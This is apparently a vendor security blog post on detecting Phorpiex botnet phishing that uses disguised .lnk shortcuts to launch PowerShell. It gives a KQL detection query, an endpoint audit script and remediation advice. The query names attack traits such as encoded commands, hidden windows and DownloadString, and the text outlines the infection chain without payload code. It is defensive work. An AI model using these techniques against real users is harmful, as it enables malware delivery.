Defending Against Phorpiex: How to Detect Malicious .LNK Files and PowerShell Attacks

Introduction

Security operations centers (SOCs) are currently tracking a high-volume social engineering campaign leveraging the notorious Phorpiex botnet (also known as Trik). Unlike sophisticated exploits targeting zero-day vulnerabilities, this campaign relies on abusing standard Windows functionality—the Windows Shortcut (.lnk) file—to deliver its payload.

Attackers are distributing these malicious files via mass email, often disguised as invoices or shipping notices. Because .lnk files are a trusted part of the Windows operating system, they can bypass basic email filtering and trick users into executing PowerShell scripts that download the malware. For defenders, this highlights the enduring risk of social engineering and the need for strict controls around file execution and PowerShell usage.

Technical Analysis

The attack vector begins with a phishing email containing an attached file disguised as a document (e.g., Invoice.doc.lnk). When a user double-clicks this file, it does not open a document. Instead, the .lnk file executes a concealed command that launches PowerShell.

1. Initial Access: The user interacts with the malicious .lnk attachment.
2. Execution: The shortcut triggers a PowerShell command, often using encoded arguments to evade static detection.
3. Payload Delivery: The PowerShell script reaches out to a remote command-and-control (C2) server to download the Phorpiex payload (a DLL or executable).
4. Impact: Once installed, Phorpiex acts as a botnet client, capable of dropping additional malware, such as ransomware (e.g., "Global Group" encryption variants mentioned in recent reports), or engaging in cryptojacking.

This technique is particularly effective because it uses "low-noise" methods—abusing native tools rather than deploying custom exploit code—which makes it harder for traditional antivirus to flag the behavior as anomalous without strict heuristics.

Defensive Monitoring

To detect this activity, security teams should monitor for unusual parent-child process relationships, specifically explorer.exe spawning PowerShell or other script interpreters, and for the creation of .lnk files in suspicious contexts.

Microsoft Sentinel / Defender KQL Query

This query looks for PowerShell processes initiated by Explorer (the shell that handles .lnk files) with specific characteristics common to Phorpiex campaigns, such as encoded commands or hidden window styles.

DeviceProcessEvents
| where Timestamp > ago(7d)
// Phorpiex LNKs often trigger PowerShell via Explorer.exe
| where InitiatingProcessFileName == "explorer.exe" 
| where FileName == "powershell.exe"
// Filter for common obfuscation flags used in these attacks
| where ProcessCommandLine has "-EncodedCommand" 
     or ProcessCommandLine has "-w hidden" 
     or ProcessCommandLine has "DownloadString"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessCommandLine
| extend EncodedCommand = extract("-EncodedCommand ([A-Za-z0-9+/]+)", 1, ProcessCommandLine)
| top 100 by Timestamp desc

PowerShell Audit Script

Use this script on endpoints to scan user Downloads folders for recently created .lnk files, which are rare in business contexts unless specifically required.

# Scan for LNK files created in the last 24 hours in user Downloads
$TimeThreshold = (Get-Date).AddDays(-1)
$Users = Get-ChildItem "C:\Users" -Directory

foreach ($User in $Users) {
    $DownloadPath = Join-Path -Path $User.FullName -ChildPath "Downloads"
    if (Test-Path $DownloadPath) {
        $LnkFiles = Get-ChildItem -Path $DownloadPath -Filter "*.lnk" -Recurse -ErrorAction SilentlyContinue | 
                    Where-Object { $_.LastWriteTime -gt $TimeThreshold -or $_.CreationTime -gt $TimeThreshold }
        
        if ($LnkFiles) {
            Write-Host "Suspicious LNK files found for user: $($User.Name)" -ForegroundColor Yellow
            $LnkFiles | Select-Object FullName, CreationTime, LastWriteTime | Format-Table -AutoSize
        }
    }
}

Remediation

To protect your organization from Phorpiex and similar .lnk-based attacks, implement the following defensive measures immediately:

1. Email Filtering: Configure your Secure Email Gateway (SEG) to block or sandbox all attachments with the .lnk extension. While legitimate internal uses exist, they are rare enough via external email to warrant a block-quarantine policy.

2. Attack Surface Reduction (ASR) Rules: Enable the Microsoft Defender ASR rule "Block Office applications from creating child processes" and "Block execution of potentially obfuscated scripts." This significantly hinders the ability of the initial shortcut or downloaded macro to launch the PowerShell stage.

3. PowerShell Constrained Language Mode: Restrict PowerShell usage to Constrained Language Mode for general users. This prevents scripts from running arbitrary Windows API calls, neutralizing many Phorpiex payload delivery mechanisms.

4. User Awareness: Update your security awareness training to specifically warn against "file icon masquerading." Teach users to hover over files to check the file type extension (e.g., .doc.lnk) before double-clicking, even if the icon looks like a standard Word or PDF document.

5. Patch and Update: Ensure all endpoints are fully patched. While this is a social engineering attack, Phorpiex often attempts to leverage older vulnerabilities for privilege escalation if initial execution succeeds.

Related Resources

Security Arsenal Incident Response Services AlertMonitor Platform Book a SOC Assessment incident-response Intel Hub